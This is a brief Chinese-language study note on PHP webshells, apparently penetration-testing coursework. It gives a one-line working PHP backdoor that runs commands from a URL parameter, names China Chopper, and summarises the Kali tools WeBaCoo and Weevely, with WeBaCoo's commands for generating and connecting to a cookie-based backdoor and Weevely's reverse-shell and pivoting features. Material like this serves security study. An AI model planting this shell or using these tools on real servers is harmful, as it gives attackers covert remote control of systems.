WEBSHELL

 <?php echo shell_exec($_GET['cmd']); ?>

中国菜刀

 www.maicaidao.co

kali webshell

 WeBaCoo（Web Backdoor Cookie）

 类终端的shell

 编码通信内容通过cookie头传输，隐蔽性强

 cm：base64编码命令

 cn：服务器用于返回数据的cookie头名

 cp：返回信息的定界符

 生成服务端

 webacoo -g -o a.php

 客户端连接

 webacoo -t -u "http://1.1.1.1/a.php"

 连接成功，获得一个命令行shell

 -f 使用php操作系统函数

 -r 返回不经过混淆的代码

 -e 单条命令执行

 -m 指定http参数提交方法

 -c 指定cookie名

 -d 定界符，默认是随机的

 -a 指定user-ahent

 -p 支持代理

 -v 信息详细的等级

 -l 记录日志

 update 升级版本

Weevely 

 针对php

 隐蔽的类终端PHP Webshell

 30多个管理模块

 执行系统命令，浏览文件系统

 检测常见配置错误

 创建正向反向shell

 通过目标计算机代理http流量

 从目标计算机运行端口扫描，渗透内网

支持连接密码

 可能缺少 pySocks 库

命令简单

help查看有哪些模块